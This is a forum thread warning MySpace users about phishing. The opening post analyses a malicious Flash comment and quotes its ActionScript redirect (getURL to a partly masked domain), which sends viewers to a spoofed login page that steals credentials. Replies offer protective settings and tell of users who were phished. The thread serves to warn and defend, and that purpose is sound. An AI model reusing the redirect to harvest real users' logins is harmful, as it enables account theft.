A friend of mine had some trouble with a guy posting comments on her myspace page. He posted messages that once loaded into the users browsers, would redirect the user back to the myspace login page.

I checked it out and found out that it was more than a little problem.
The message that was posted on the page was a simple flash object that seems to be hosted on:

http://itr.****youanddie.com/

I cracked the flash file, it doesn't have a lot to it, all it has is some actionscript:

getURL("http://itr.****youanddie.com/index.php", "_parent", "GET");

What this means is that every time someone goes to a page where he has embeded the swf in a message, they will be redirected to:

http://itr.****youanddie.com/index.php

And in case u were wondering, this page looks exactly like the myspace page... BUT ITS NOT!!!

They spoofed the page. (Apart from the spoofstick notification, looking at the source code, was a dead give away)



The action=" " should be something like



Basically, this means that the person who recieves the post of the script will have the username and password of the person trying to access myspace through this page.

This is a pretty serious issue for people using any sites really, not just myspace. Its not a hard thing for joe anybody to do.

If you are unsure of a site, then I would suggest using something like SpoofStick. This works as a toolbar for IE or Firefox and can show you the actual site that you are on.

 

 

 

Reply

I have and use a myspace and as far as i know the only way you can post something on someones site you have to be theyre friend and to become theyre friend they have to accept your request so if that problem happens to you its really your own fault is the way i see it.Just check out that persons profile and stuff if your not sure if you want to become theyre friend and you should be safe thats all ive been doing not accepting and john doe sending me a message i want to be your friend.Sorry if this was saying the same thing over just making sure i made my point.

Reply

I personally have a myspace account and would like to say thanks for the heads up. However, I just checked my account and I've had this for a while so I'm not 100% sure on this, but as far as I remember, punkpig5 is correct in that only friends which you must approve are allowed to post comments. If you want to be more secure, there is always the option to disable HTML language in comments. Just click Home > Account Settings > Profile Settings (3rd option from the bottom) > then tick the types of comments you want to disable HTML in. There are three options: Picture, Blog and Profile Comments. Then click the "Change Settings" button to save your preference. Hope this helps those who want to stay on the safe side.

Reply

Ahhh yes, but there are other ways that you can be affected. What about if a person posted something like this on one of your friends pages? As soon as you look at their page, you will be redirected to the fake login page. This is how most people are being affected. They just assume that they have to type their username and password in to continue. I'm sorry I didn't make this clear in my earlier post.

Reply

someone phished my account
Phishing In Myspace

Ok so I went to login to my account and tom left a message for me saying that someone phished my account. Now I know who did it, it was my ex boyfriend because he was mad at me. Oh well, he lost me doesn't mean that he should take control of my account. He didn't even know my password. I knew his because I had to change it for him. So people who phish need to have their profiles deleted and a block put up so that they can never enter myspace or friendster or facebook or anything like those sites again.

What they do is wrong. It is completely stupid. I feel violated. So I had to change my password. It was absolutely no fun. They invade your privacy.

-Stephanie

Reply

My Space Phishing
Phishing In Myspace

Hey for anyone out there in my space land, I have a warning... I was on My Space awhile back and one of the people on my friends list sent a comment about this awesome profile tracker where you can see who looks at you're page.

So, like a big dummy I clicked on it and tried to sign up for it. The next thing I know, This thing had taken over my blog and was sending that comment to everyone on my friends list.I tried to get rid of it by changing my password and deleting it from my blog, but I eventually had to just cancel my account and start over.

It may sound like a stupid thing to fall for ,but his thing actually has a pic of Tom on it, and as a new my spacer I totally fell for it; so if you get this comment from anyone DON"T DO IT!!

-sogullible

Reply

Did I get phished? What should I do now???
Phishing In Myspace

I just got a mail though myspace from a "friend" saying "someone is posting pictures from you on this webiste freefunphotos (dot) com"...I opened the site (yes...I'm stupid...I know) and a white page appeared...Not much else...I have NO idea what happened, I've changed ALL my passwords to make sure they didn't get phished and I don't know what to do next! DO NOT GO TO THIS WEBSITE! I've read it's a phishing site, although nothing has happened on my account yet, I'm so afraid it might will! Do you have any idea what I could do to protect myself??

Reply

i was phished
Phishing In Myspace

My issue was similiar to the last post. I was told my profile pic was on gabprofiles. I didnt click the link but googled the site but couldnt find mush so typed in the url into the address bar but was still logged in to myspace at the time. The next day I logged in I had a message from tom telling me to change my password as my site was phished. Wankers

-reply by newby

Reply

The easiest way to avoid phishing sites that record your login data is to check the URL of the site you are browsing before entering your personal information, although these days phishing sites are using very similar domain names to trick the user into entering their login data.

Reply